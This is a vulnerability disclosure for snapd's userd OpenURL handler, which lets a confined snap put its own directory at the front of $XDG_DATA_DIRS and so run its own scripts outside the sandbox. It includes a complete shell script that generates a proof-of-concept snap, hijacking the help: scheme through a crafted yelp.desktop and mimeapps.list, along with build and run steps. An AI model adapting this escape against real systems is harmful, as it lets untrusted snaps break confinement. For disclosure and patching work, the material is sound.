snap userd's OpenURL implementation alters the value of $XDG_DATA_DIRS to include a directory controlled by the calling snap before calling /usr/bin/xdg-open:

https://github.com/snapcore/snapd/blob/7f678b92/usersession/userd/launcher.go#L109-L113

This allows the snap to control how the URL will be opened, including having executables provided by the snap run outside of confinement.

Attached is an example snap demonstrating the exploit. It works as follows:

1. the snap provides a single command plugging the desktop interface that calls "xdg-open help://whatever"
2. userd invokes the host system /usr/bin/xdg-open with $SNAP/usr/share/applications at the start of $XDG_DATA_DIRS.
3. under $SNAP/usr/share/applications, we have a yelp.desktop file whose Exec line points to an "outside-sandbox.sh" script shipped with the snap, and a mimeapps.list file to set it as the default handler for the "help:" scheme.
4. the "outside-sandbox.sh" script is executed without confinement and writes a file /tmp/foo.txt

This file can be seen in the host system /tmp rather than the snap's private /tmp, demonstrating that it was run outside the sandbox.
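The following script lays out the source tree of a snap matching the four steps above. It is an added example written for this page, not the snap attached to the report. It assumes a snap named "xdg-open-poc" with an app called "poc" (so the files are reachable on the host as /snap/xdg-open-poc/current/...), a core18 base built with snapcraft's "dump" plugin, and that "xdg-open" inside confinement resolves to the snapd-provided shim that forwards to userd's OpenURL; all of these are assumptions, not details from the report.

```shell
#!/bin/sh
# Added example (not the snap attached to the report): generate the source
# tree of a proof-of-concept snap for the userd OpenURL / XDG_DATA_DIRS issue.
# Assumptions: snap name "xdg-open-poc" (host path /snap/xdg-open-poc/current),
# app name "poc", core18 base, snapcraft "dump" plugin, and that xdg-open inside
# the snap is the snapd shim that calls userd's OpenURL.
set -eu

SNAP_NAME=xdg-open-poc

# Create the PoC tree under $1: snapcraft.yaml, the confined command,
# the yelp.desktop entry, the mimeapps.list override and the payload script.
make_poc_snap_tree() {
    dir=$1
    mkdir -p "$dir/snap" "$dir/usr/share/applications"

    # Step 1: one strictly confined app plugging "desktop", which is what lets
    # the command reach userd's OpenURL via the xdg-open shim.
    cat > "$dir/snap/snapcraft.yaml" <<EOF
name: $SNAP_NAME
version: '0.1'
summary: userd OpenURL / XDG_DATA_DIRS confinement escape PoC
description: Demonstrates userd passing a snap-controlled XDG_DATA_DIRS to the host xdg-open.
base: core18
confinement: strict
grade: devel

apps:
  poc:
    command: run-poc.sh
    plugs: [desktop]

parts:
  poc:
    plugin: dump
    source: .
EOF

    # The command run inside confinement: just open a help: URL.
    cat > "$dir/run-poc.sh" <<'EOF'
#!/bin/sh
exec xdg-open help://whatever
EOF

    # Step 3a: desktop entry found first because $SNAP/usr/share/applications
    # is at the head of XDG_DATA_DIRS. Exec uses the host-visible path so the
    # host xdg-open can run the payload.
    cat > "$dir/usr/share/applications/yelp.desktop" <<EOF
[Desktop Entry]
Type=Application
Name=Yelp
Exec=/snap/$SNAP_NAME/current/outside-sandbox.sh %u
MimeType=x-scheme-handler/help;
NoDisplay=true
EOF

    # Step 3b: make yelp.desktop the default handler for the help: scheme.
    cat > "$dir/usr/share/applications/mimeapps.list" <<'EOF'
[Default Applications]
x-scheme-handler/help=yelp.desktop
EOF

    # Step 4: payload executed by the host xdg-open, i.e. outside confinement.
    # If it were confined, /tmp would be the snap's private tmp and the file
    # would not show up under the host's /tmp.
    cat > "$dir/outside-sandbox.sh" <<'EOF'
#!/bin/sh
echo "opened by $(id -un) from $0 at $(date)" > /tmp/foo.txt
EOF

    chmod +x "$dir/run-poc.sh" "$dir/outside-sandbox.sh"
}

# Read back the default handler for scheme $2 from the generated tree ($1),
# mirroring the mimeapps.list lookup xdg-mime performs on XDG_DATA_DIRS.
default_handler() {
    sed -n "s/^x-scheme-handler\/$2=//p" "$1/usr/share/applications/mimeapps.list"
}

make_poc_snap_tree "${POC_DIR:-./$SNAP_NAME}"
```

After generating the tree, build and install it with snapcraft and "snap install --dangerous", run "snap run xdg-open-poc.poc" from a desktop session, and then check for /tmp/foo.txt on the host (outside any snap). A file that appears there, rather than only under the snap's private tmp, is the same evidence the report describes.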